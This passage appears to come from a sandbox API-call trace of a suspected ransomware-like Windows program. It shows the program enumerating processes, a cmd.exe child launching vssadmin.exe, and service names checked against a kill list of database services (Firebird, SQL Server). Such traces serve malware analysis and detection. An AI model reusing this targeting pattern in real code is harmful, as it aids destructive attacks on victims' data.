th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0039.496] lstrlenW (lpString="lsass.exe") returned 9 [0039.496] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0039.497] lstrlenW (lpString="lsm.exe") returned 7 [0039.497] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.497] lstrlenW (lpString="svchost.exe") returned 11 [0039.497] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.498] lstrlenW (lpString="svchost.exe") returned 11 [0039.498] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.499] lstrlenW (lpString="svchost.exe") returned 11 [0039.499] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.499] lstrlenW (lpString="svchost.exe") returned 11 [0039.499] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.500] lstrlenW (lpString="svchost.exe") returned 11 [0039.500] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0039.501] lstrlenW (lpString="audiodg.exe") returned 11 [0039.501] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.502] lstrlenW (lpString="svchost.exe") returned 11 [0039.502] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.502] lstrlenW (lpString="svchost.exe") returned 11 [0039.502] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0039.503] lstrlenW (lpString="dwm.exe") returned 7 [0039.503] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0039.504] lstrlenW (lpString="explorer.exe") returned 12 [0039.504] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0039.504] lstrlenW (lpString="spoolsv.exe") returned 11 [0039.504] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0039.505] lstrlenW (lpString="taskhost.exe") returned 12 [0039.505] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.506] lstrlenW (lpString="svchost.exe") returned 11 [0039.506] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0039.507] lstrlenW (lpString="taskeng.exe") returned 11 [0039.507] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0039.507] lstrlenW (lpString="taskhost.exe") returned 12 [0039.507] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0039.508] lstrlenW (lpString="called.exe") returned 10 [0039.508] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0039.509] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0039.509] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0039.510] lstrlenW (lpString="analyst.exe") returned 11 [0039.510] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0039.510] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0039.510] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0039.511] lstrlenW (lpString="wages.exe") returned 9 [0039.511] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0039.512] lstrlenW (lpString="rand.exe") returned 8 [0039.512] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0039.512] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0039.512] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0039.513] lstrlenW (lpString="cottage.exe") returned 11 [0039.513] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0039.514] lstrlenW (lpString="pairs_spec.exe") returned 14 [0039.514] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0039.514] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0039.514] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0039.515] lstrlenW (lpString="observationshairy.exe") returned 21 [0039.515] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0039.516] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0039.516] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0039.517] lstrlenW (lpString="spectrum.exe") returned 12 [0039.517] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0039.517] lstrlenW (lpString="dies.exe") returned 8 [0039.517] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0039.518] lstrlenW (lpString="configured.exe") returned 14 [0039.518] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0039.519] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0039.519] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0039.519] lstrlenW (lpString="fast.exe") returned 8 [0039.519] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0039.520] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0039.520] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0039.521] lstrlenW (lpString="review.exe") returned 10 [0039.521] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0039.522] lstrlenW (lpString="historybinding.exe") returned 18 [0039.522] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0039.758] lstrlenW (lpString="pk task surge.exe") returned 17 [0039.758] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0039.759] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0039.759] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0039.760] lstrlenW (lpString="mobsync.exe") returned 11 [0039.760] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0039.760] lstrlenW (lpString="ivttvf.exe") returned 10 [0039.760] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0039.761] lstrlenW (lpString="cmd.exe") returned 7 [0039.761] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0039.762] lstrlenW (lpString="conhost.exe") returned 11 [0039.762] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0039.762] lstrlenW (lpString="vssadmin.exe") returned 12 [0039.763] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0039.763] lstrlenW (lpString="VSSVC.exe") returned 9 [0039.763] Process32NextW (in: hSnapshot=0x1d4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0 [0039.764] CloseHandle (hObject=0x1d4) returned 1 [0039.764] Sleep (dwMilliseconds=0x1f4) [0040.642] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5effd0 [0040.642] EnumServicesStatusExW (in: hSCManager=0x5effd0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0040.642] GetLastError () returned 0xea [0040.643] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x123e) returned 0x403a508 [0040.643] EnumServicesStatusExW (in: hSCManager=0x5effd0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x403a508, cbBufSize=0x123e, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x403a508, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0040.643] CloseServiceHandle (hSCObject=0x5effd0) returned 1 [0040.643] lstrlenW (lpString="Appinfo") returned 7 [0040.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0040.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0040.644] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0040.644] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0040.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0040.644] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0040.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0040.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0040.644] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0040.644] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0040.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0040.644] lstrlenW (lpString="AudioSrv") returned 8 [0040.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0040.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0040.644] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0040.644] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0040.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0040.644] lstrlenW (lpString="BFE") returned 3 [0040.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0040.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0040.644] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0040.644] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0040.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0040.644] lstrlenW (lpString="CryptSvc") returned 8 [0040.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0040.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0040.644] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0040.644] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0040.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0040.644] lstrlenW (lpString="CscService") returned 10 [0040.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0040.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0040.644] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0040.644] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0040.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0040.644] lstrlenW (lpString="DcomLaunch") returned 10 [0040.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0040.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0040.645] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0040.645] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0040.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0040.645] lstrlenW (lpString="Dhcp") returned 4 [0040.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0040.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0040.645] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0040.645] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0040.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0040.645] lstrlenW (lpString="Dnscache") returned 8 [0040.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0040.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0040.645] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0040.645] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0040.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0040.645] lstrlenW (lpString="DPS") returned 3 [0040.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0040.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0040.645] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0040.645] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0040.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0040.645] lstrlenW (lpString="eventlog") returned 8 [0040.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0040.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0040.645] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0040.645] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0040.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0040.645] lstrlenW (lpString="EventSystem") returned 11 [0040.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0040.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0040.645] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0040.645] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0040.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0040.646] lstrlenW (lpString="gpsvc") returned 5 [0040.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0040.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0040.646] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0040.646] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0040.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0040.646] lstrlenW (lpString="iphlpsvc") returned 8 [0040.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0040.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0040.646] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0040.646] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0040.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0040.646] lstrlenW (lpString="LanmanServer") returned 12 [0040.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0040.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0040.646] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0040.646] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0040.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0040.646] lstrlenW (lpString="LanmanWorkstation") returned 17 [0040.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0040.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0040.646] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0040.646] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0040.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0040.646] lstrlenW (lpString="lmhosts") returned 7 [0040.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0040.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0040.646] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0040.646] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0040.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0040.646] lstrlenW (lpString="MMCSS") returned 5 [0040.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0040.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0040.646] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0040.646] lstrcmpiW 